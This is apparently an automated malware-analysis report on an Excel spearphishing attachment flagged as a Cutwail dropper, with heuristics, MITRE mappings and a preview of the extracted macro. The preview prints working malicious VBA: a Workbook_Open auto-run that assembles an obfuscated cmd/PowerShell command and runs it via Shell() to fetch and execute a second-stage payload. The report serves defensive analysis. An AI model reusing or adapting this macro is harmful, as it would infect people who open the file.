MALICIOUS
260
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
This Excel document contains a Workbook_Open VBA macro that uses the Shell() function to execute a command. The macro constructs and executes a complex PowerShell command, likely to download and run a second-stage payload. The presence of cmd.exe references and the overall structure strongly suggest a dropper functionality.
Heuristics 6
-
ClamAV: Xls.Dropper.Cutwail-6737961-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Cutwail-6737961-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBA
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4510 bytes |
SHA-256: fc964a4b5247b67d83d9560bdef11faeece07370c6ce22a1c4c007bce06095b8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function SpaceExtender()
SpaceExtender = "cmd /V:ON/C""set 8O=%nGk%c/eXE.DmC ^&^&) ""\eU`Lav""\.) )'vne','sXL:' f- ""\}0{}1{""\( )'tEg','tIdLIHc-','Me' f-""\}0{}1{}2{""\ (. ( (ekovnI.) 't','pirCS','eKovNI'f- ""\}2{}1{}0{""\(.""\DnA`M`MoC`EKOvNi""\.""\EulA`V""\.))'av','tX','Etno','cNo','ITuCExe:elBAiR' f- ""\}3{}2{}1{}0{}4{""\ ( )'sL'(. ( INON- sSAPYB nOItucEXe- lOn- POn- H TSWoDnIw- llehsReWOP=nGk TES^&^&)''nIOj-'X'+]3,1[)(GNiRtSOt.EcNEreFErPEsObrev$ (^&^^ ^|^^)93]rAhC[]gnIRTs[,'z43'(ECaLper.)69]rAhC[]gnIRTs[,'DLm'(ECaLper.)43]rAhC[]gnIRTs[,'WKE'(ECaLper.)'^|^^',)05]rAhC[+99]rAhC[+211]rAhC[((ECaLper.)'$',)98]rAhC[+77]rAhC[+65]rAhC[((ECaLper.)'))]1501..0[}O{YM8(WKEgNiRTDLmsDLmTeGW'+'KE.WKEiIDLmCsAWKE::}klDLm530o{YM8 ()z43XEz43,z43Iz43f- WKE'+'}1{}0{WKE(^&^^;}}))51 dnab- WKEGWKE.}P{YM8(rob-)61*)51dnab-WKEBWKE.}P{YM8((WKEekDLmOvniWKE.))z43olFz43,z43oz43'+' f- WKE}0'+'{}1{WKE(,z43rz43f- WKE}0{}1'+'{WKE(::WKEEuLADLmvWKE.))z43hz43+z43ieXz43( )z43Ez43,z'+'43Vz43,)z43lBz43,z43a'+'z43'+',z43Airz43f-"
End Function
Sub Workbook_Open()
AccentCalculation
End Sub
Function Attmemo()
Attmemo = " WKE}2{}0{}1{WKE( f-WKE}2{}0{}1{W'+'KE(. ( (=]}X{YM8+005*}_{YM8[}O{YM8;)}_{YM8,}X{YM8(WKEeKoVDLmnIWKE.))z43teGz43,z43Pz43 f-'+'WKE}'+'0{}1{WKE(,z43lexz43,z43iz43f-WKE}1{}0{}2{WKE('+'.}G{YM8=}P{YM8{))994..0(ni }x{YM8(hcaerof{)z43%z43(.2cp)'+'2..0(;0051 ))z43[z43,)z43yBz4'+'3,z43etz43f'+'-WKE}0{}1{WKE(f-WKE}1{}0{WKE(,z43]z43 f-WKE}0{}1{WKE( )z43xxz43(.=}O{YM8;))))'+'z43iz43,)z43rugz43,z43oc.z43 f-WKE}0{}1{WKE(,z43m'+'z43 f- W'+'KE}1{}0{}2{WKE(,z43hz43,)z43NFz43,)z439z43,))z4333Sz43,z43.z43 f-WKE}'+'0{}1{WKE(,z43npz43 f- WKE}0{}1{WKE( f-WKE}0{}1{WKE(,z43oz43 f-WKE}1{'+'}0{}2{WKE(,z4'+'3gz43,z43mz43,z43.iz43,z43/z43,))z43sptz43,z43tz43 f- WKE}1{}0{WKE(,z43/:z43,z43/z43 f-WKE}0{}1{}2{WKE(f- WKE}4{}5{}1{}3{}7{}2{}0{}6{WKE((WKEEKOVNDLmiWKE.)z43pOz4'+'3,))z43ez43,)z43az43,z43eRnz43 f- WKE}1{}0{WKE(f- WKE}0{}1{WKE(,z43dz43 f-WKE}0{}1{WKE( f- WKE}0{}1{WKE(.)))z'+'43Nz43,z43.tez43f-'+' WKE}0{}1{WKE(,)z43lCz43,z43bez43f-WKE}1{}0{WKE(,z43Wz43,)z43neiz43,z43tz43 f-WKE}0{"
End Function
Function HelpCon()
HelpCon = "}1{WKE( f- WKE}0{}2{}1{}3{WKE( )z43xxz43(^&^^(()z43ez43,)z43'+'tz43,z43sySz43 f- WKE}1{}0{WKE(,z43mz4'+'3'+',)z43.z43,))z43Bz43,z4'+'3.gnz43f- WKE}1{}'+'0{WKE(,z43tiz43f- WKE}0{}'+'1{W'+'KE(,)z43iwz43,z43arDz43f- WKE'+'}1{}0'+'{WKE( f-WKE}1{}0{}2{WKE(,z43pamz43f-WKE}0{}1{}2{}4{}3{WKE( )z43xxz43(.=}G{YM8;)z43gnz43,z43iz43,z43Sz43,)z43etz43,)z43wz43,)z43rDz43,z43.mz43 f-WKE}1{}0{WKE(,z43az43f-WKE}2{}0{}1{W'+'KE(,z43syz43 f- WKE}1{}2{}0{WKE('+' f-WKE}3{}2{}0{}1{WK'+'E( emaNylbmessA- ))z43T-dz43,z43dAz43f-WKE}1{}0{WKE(,z43yz43,z43epz43 f- WKE}0{}1{}2{WKE(.;)z43tcez43,z43eNz43,)z43jz43,)z43-wz43,z4'+'3bOz43 f-WKE}0{}1{WKE('+'f-WKE}1{}0{WKE(f- WKE}2{}0{}1{W'+'K'+'E( )z43xxz43( )z43asz43,z43lz43f- WKE}0{}1{WKE(. ; )z43et.z43,z43metz43,z43.txz'+'43,)z43GNiz43,z43DOz43,z43CnEz43 f-WKE}2{}1{}0{WKE(,z43SYsz43F- WKE}1{}2{}4{}3{}0{WKE(]EPyt[ = '+' }KL'+'53DLm0o{YM8;) )z43HtAz43,z43mz43f- WKE}1{}0{WKE('+']EpYt[ ( )))z43Lz43,)z43EX:z43,z43ez43f- WK"
End Function
Function Office31()
Office31 = "E}1{}0{WKE(f- WKE}0{}1{WKE(,z43HIz43 f-WKE}0{}1{WKE(+WKEBWKE+WKEAIWKE+WKERaVWKE( )z43Mz43,z43teSz43,)z43i-z43,z43Etz43 f-WKE}0{}'+'1{WKE( f-WKE}2{}0{}1{WKE(^&^^'+' '( =sXl TEs&&for /L %X in (3029,-1,0)do set Swkc=!Swkc!!8O:~%X,1!&&if %X equ 0 cmd /C !Swkc:~6!"""
End Function
Private Function cellandtable()
cellandtable = SpaceExtender + Attmemo + HelpCon & Office31
End Function
Sub AccentCalculation()
Call Shell(cellandtable, 6 - 1 - 5)
End Sub
Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_Predeclared
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.